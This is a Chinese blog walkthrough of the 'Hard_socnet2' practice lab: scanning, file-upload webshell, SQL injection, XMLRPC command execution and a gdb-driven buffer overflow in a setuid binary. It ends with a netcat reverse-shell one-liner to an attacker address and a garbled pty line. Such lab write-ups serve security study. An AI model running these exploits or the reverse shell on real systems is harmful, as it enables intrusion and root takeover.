<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"topdayplus.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="Hard_socnet2 打靶记录">
<meta property="og:type" content="article">
<meta property="og:title" content="Hard_socnet2">
<meta property="og:url" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/index.html">
<meta property="og:site_name" content="Topday&#39;s Blog">
<meta property="og:description" content="Hard_socnet2 打靶记录">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/01.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/02.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/03.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/04.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/05.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/06.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/07.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/08.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/09.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/10.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/11.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/12.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/13.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/14.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/15.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/16.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/17.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/18.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/19.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/20.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/21.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/22.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/23.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/24.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/25.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/26.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/27.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/28.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/29.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/30.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/31.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/32.png">
<meta property="og:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/33.png">
<meta property="article:published_time" content="2022-11-12T15:39:23.000Z">
<meta property="article:modified_time" content="2022-11-15T17:17:26.324Z">
<meta property="article:author" content="Topday">
<meta property="article:tag" content="打靶">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://topdayplus.github.io/2022/11/12/hard-socnet2/01.png">


<link rel="canonical" href="http://topdayplus.github.io/2022/11/12/hard-socnet2/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://topdayplus.github.io/2022/11/12/hard-socnet2/","path":"2022/11/12/hard-socnet2/","title":"Hard_socnet2"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Hard_socnet2 | Topday's Blog</title>
  






  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Topday's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Topday"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Topday</p>
  <div class="site-description" itemprop="description">For me, it has not yet been realized what the rest of one’s life, is my greatest encouragement.</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/topdayplus" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;topdayplus" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://topdayplus.github.io/2022/11/12/hard-socnet2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Topday">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Topday's Blog">
      <meta itemprop="description" content="For me, it has not yet been realized what the rest of one’s life, is my greatest encouragement.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Hard_socnet2 | Topday's Blog">
      <meta itemprop="description" content="Hard_socnet2 打靶记录">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Hard_socnet2
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
  
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-11-12 23:39:23" itemprop="dateCreated datePublished" datetime="2022-11-12T23:39:23+08:00">2022-11-12</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-11-16 01:17:26" itemprop="dateModified" datetime="2022-11-16T01:17:26+08:00">2022-11-16</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%BA%A2%E9%98%9F/" itemprop="url" rel="index"><span itemprop="name">红队</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>3.6k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>3 分钟</span>
    </span>
</div>

            <div class="post-description">Hard_socnet2 打靶记录</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p><strong>0x01 主机发现</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo arp-scan -l</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/01.png" class title="This is an example image">



<p><strong>0x02 端口扫描</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p- 10.0.2.8</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/02.png" class title="This is an example image">



<p><strong>0x03 服务识别</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p22,80,8000 -sV 10.0.2.8 </span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/03.png" class title="This is an example image">

<p>得到基本信息，ubuntu，python2，apache</p>
<p><strong>0x04 服务识别</strong></p>
<p>访问 8000 端口，提示请求方式不支持</p>
<img src="/2022/11/12/hard-socnet2/04.png" class title="This is an example image">



<p>那就把八种请求方式全部试一遍。OPTIONS、HEAD、GET、POST、PUT、DELETE、TRACE、CONNECT。最终也只有POST请求返回信息有些许不同。</p>
<img src="/2022/11/12/hard-socnet2/05.png" class title="This is an example image">



<p>根据返回信息可以看到，提示 xml 解析报错，元素为空，猜测应该是服务端对外提供的 api，但具体调用格式还不清楚，先换个点，收集多点信息。</p>
<p><strong>0x05 后台图片上传 &amp; SQL注入</strong></p>
<p>访问默认 80 端口。有个 Pynch 系统，有个登录框和注册框，并且登录账号为邮箱。</p>
<img src="/2022/11/12/hard-socnet2/06.png" class title="This is an example image">



<p>真实渗透场景下需要收集目标相关的邮箱信息，再构造字典尝试登录。但由于目标在此目标没发现什么邮箱信息，那就直接注册个账号进去看看吧。</p>
<img src="/2022/11/12/hard-socnet2/07.png" class title="This is an example image">



<p>可以看到，此系统类似博客，每个人都可以留言，其中有 admin 账户的留言信息，表示后台已经运行了一个 monitor.py 监控程序，应该是伏笔，先记着。</p>
<p>经过后续测试发现两个突破口。第一个是个人信息的头像图片上传，存在任意文件上传。那就好办了，直接上蚁剑。</p>
<img src="/2022/11/12/hard-socnet2/08.png" class title="This is an example image">



<p>第二个是搜索框存在SQL注入。使用sqlmap注入尝试。</p>
<img src="/2022/11/12/hard-socnet2/09.png" class title="This is an example image">



<p>尝试读取用户表的信息。这里的信息是用于登录系统后台，登录admin后台并没有发现更多的功能点，暂时搁置。根据获得密码登录SSH，无果。</p>
<img src="/2022/11/12/hard-socnet2/10.png" class title="This is an example image">



<p><strong>0x06 尝试提权到 sudo 用户</strong></p>
<p>由于现在蚁剑获得了一个普通的权限，尝试提权。提权思路通常为：</p>
<ol>
<li><p>内核提权，uname -a</p>
<p>这个后面再讲，不符合当时靶机作者的思路。</p>
</li>
<li><p>sudo 提权</p>
<p>当前用户没有执行 sudo 相关程序的权限。</p>
</li>
<li><p>suid 权限配置不当，通过执行高权限用户文件得到高权限。</p>
<p>暂无找到 suid 相关的执行文件存在漏洞。</p>
</li>
</ol>
<p>来一波信息收集吧</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/passwd</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/11.png" class title="This is an example image">



<p>有 bash 权限的 socnet 存在主目录，并且其他组用户有查看权限，赶紧进去瞧瞧。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -l /home</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/12.png" class title="This is an example image">



<p>可以看到有个monitor.py，想起之前的在系统后台看到管理员说过，后台已经开启了 monitor ，查看是否开启。可以看到程序确实已经启动。</p>
<img src="/2022/11/12/hard-socnet2/13.png" class title="This is an example image">



<p>查看 monitor.py。这个文件有这么几个点：</p>
<ol>
<li>在 8000 端口开启了一个 XMLRPC 服务</li>
<li>随机生成一个1000到9999的数字，用于后续验证</li>
<li>定义了5个函数，其中四个为执行固定命令，一个为执行外部传输的指令，但前提是随机数正确</li>
</ol>
<img src="/2022/11/12/hard-socnet2/14.png" class title="This is an example image">



<p>另外 XMLRPC 就是通过解析 XML 格式的数据去执行功能点。</p>
<img src="/2022/11/12/hard-socnet2/15.png" class title="This is an example image">



<p>这样的话就有思路了，能否爆破出随机数，进而执行代码呢！</p>
<img src="/2022/11/12/hard-socnet2/16.png" class title="This is an example image">



<p>执行后爆破出来的随机数是 8793</p>
<img src="/2022/11/12/hard-socnet2/17.png" class title="This is an example image">



<p>修改代码，尝试进行命令执行。成功！</p>
<img src="/2022/11/12/hard-socnet2/18.png" class title="This is an example image">



<p>拿到了有 bash 权限的 socnet 用户，看看有没有相关提权漏洞，木的</p>
<img src="/2022/11/12/hard-socnet2/19.png" class title="This is an example image">



<p><strong>0x07 逆向工程 &amp; 动态调试 提权</strong></p>
<p><strong>提权</strong>的寻常思路不管用，那就继续信息收集吧。查看当前用户主目录下的文件信息，其中 monitor.py 为开启 XMLRPC 服务的文件，第一个文件 add_record，为 32 位的可执行程序，而且文件还有 setuid, setgid 属性。这就意味着，如果这个程序能够执行反弹 shell，那反弹的就是 root 权限。</p>
<img src="/2022/11/12/hard-socnet2/20.png" class title="This is an example image">



<p>第三个是 peda 目录，其实就是一个让 linux 自带的 <strong>GDB</strong> 显示得更友好，就是 GDB 的一个插件。而 GDB 是Linux下用来调试程序的，这一切仿佛都在暗示第一个可执行程序有问题。</p>
<img src="/2022/11/12/hard-socnet2/21.png" class title="This is an example image">



<p>说到可执行程序漏洞，往往就是栈溢出，原理就是输入异常数据，使得数据溢出到其他寄存器，导致可执行任意代码。</p>
<p>我们先来看看 add_record 这个程序的功能，运行试试。可以看到总共有五个输入点，Employee Name，Year worked，Salary，in trouble，Explain。</p>
<img src="/2022/11/12/hard-socnet2/22.png" class title="This is an example image">



<p>使用 gdb 进行运行调试。尝试在每个输入点注入相同字符，如果字符溢出到其他寄存器则存在缓冲区溢出漏洞。直接python打印A字符用于输入。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&quot;print(&#x27;A&#x27;*500)&quot;</span></span><br></pre></td></tr></table></figure>



<p>开始 gdb 运行调试（第一个输入点，正常退出）：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gdb -q ./add_record  #安静模式启动调试程序</span><br><span class="line">r #正常执行程序</span><br><span class="line">AAA... #输入字符验证溢出</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/23.png" class title="This is an example image">



<p>那就挨个输入点调试，在最后一个点触发了不正常退出。可以看到A字符被填充到其他寄存器里。</p>
<img src="/2022/11/12/hard-socnet2/24.png" class title="This is an example image">



<p>重点需要关注的是EIP寄存器，这是指令寄存器，放的是CPU下一条要执行指令的地址。可以看到这里EIP寄存器也被A字符填充了，如果我们能够控制shellcode的代码放在EIP中，那么CPU就会去执行。所以现在我们需要定位，测试时的500个字符中填充到EIP是哪部分。</p>
<p>这里用 gdb 内置的功能生成100字符，特点是每四个字符不同。便于我们定位EIP的填充字段。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">gdb-peda$ </span><span class="language-bash">pattern create 100</span></span><br><span class="line">&#x27;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL&#x27;</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/25.png" class title="This is an example image">



<p>之后执行 <code>pattern search</code> ，可以看到EIP对应的偏移为62，意味着从第63个字符开始就会进入EIP。</p>
<img src="/2022/11/12/hard-socnet2/26.png" class title="This is an example image">



<p>生成测试字符串，前62个字符为A，后面为BCDE，可以看到BCDE顺利被填充进EIP寄存器。这里需要说明一下，BCDE字符在内存中是倒过来存储的，存储为EDCB。即0x45444342对应的为EDCB，后续我们指定地址的时候要注意。</p>
<img src="/2022/11/12/hard-socnet2/27.png" class title="This is an example image">



<p>输入 <code>disas main</code> 进行汇编分析，其中@plt为系统内置的函数</p>
<img src="/2022/11/12/hard-socnet2/28.png" class title="This is an example image">



<p>有个 vuln 函数引起了注意，这名字明显不对头，而且这是在主程序中加载的，也就说默认执行程序时就已经执行了这函数，进去瞧瞧 <code>disas vuln</code>。</p>
<img src="/2022/11/12/hard-socnet2/29.png" class title="This is an example image">



<p>可以看到 vuln 函数中执行了 strcpy 内置函数，这函数已经披露过有缓冲区溢出漏洞，也就是说溢出后，<strong>我们可以指定任意内存地址跳转</strong>。</p>
<p>查看当前程序使用的函数列表 <code>info func</code>。其中 system 函数用于执行系统命令，setuid用于申请root权限，</p>
<img src="/2022/11/12/hard-socnet2/30.png" class title="This is an example image">



<p>还有个 backdoor 函数，这怎么看都很可疑，<code>disas backdoor</code>进去看看，system函数是在这里面调用的~</p>
<img src="/2022/11/12/hard-socnet2/31.png" class title="This is an example image">



<p>理一下思路，程序运行时自动加载 <code>vuln</code> 函数，其中调用了 <code>strcpy</code> ，导致其存在溢出漏洞，我们可以把 EIP 指向 <strong>backdoor</strong> 函数，因为里面执行了 setuid，和 system 函数。先尝试看看会执行成什么样，构造 payload，前62个字符为A，后续接上十六进制的 <code>backdoor</code> 地址，要倒着写。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 -c &quot;import struct; print(&#x27;A&#x27;*62 + struct.pack(&#x27;I&#x27;,0x08048676))&quot;</span><br></pre></td></tr></table></figure>

<img src="/2022/11/12/hard-socnet2/32.png" class title="This is an example image">



<p>可以看到，在输入 <code>backdoor</code>函数里调用 system 自动执行了 &#x2F;bin&#x2F;bash，而且在之前还执行了 setuid 。因此，生成 payload，第一个参数a，第二个参数1，第三个参数1，第四个参数1，第五个参数为62个A加上 backdoor的地址。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 -c &quot;import struct; print(&#x27;a\n1\n1\n1\n&#x27; + &#x27;A&#x27;*62 + struct.pack(&#x27;I&#x27;,0x08048676))&quot; &gt; payload</span><br></pre></td></tr></table></figure>



<p>执行 cat payload - | .&#x2F;add_record</p>
<img src="/2022/11/12/hard-socnet2/33.png" class title="This is an example image">



<p><strong>0x08 内核提权</strong></p>
<p>其实这台主机可以直接用 CVE-2021-3493 提权到 root，但因为靶机发布在此漏洞之前，作者应该是没想到这种情况。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">命令执行反弹shell</span></span><br><span class="line">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc 10.0.2.7 3333 &gt;/tmp/f</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">通过python优化交互的shell</span></span><br><span class="line">python -c &quot;import pty; pty,spawn(&#x27;/bin/bash) &lt;les$ python  -c &quot;import pty; pty,spawn(&#x27;/bin/bash)&quot;&#x27;)&quot;</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
	

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Topday
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://topdayplus.github.io/2022/11/12/hard-socnet2/" title="Hard_socnet2">http://topdayplus.github.io/2022/11/12/hard-socnet2/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E6%89%93%E9%9D%B6/" rel="tag"># 打靶</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/11/05/AdmX-new/" rel="prev" title="AdmX_new">
                  <i class="fa fa-chevron-left"></i> AdmX_new
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/11/23/EvilBox-One/" rel="next" title="EvilBox_One">
                  EvilBox_One <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Topday</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">266k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">4:02</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>


    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
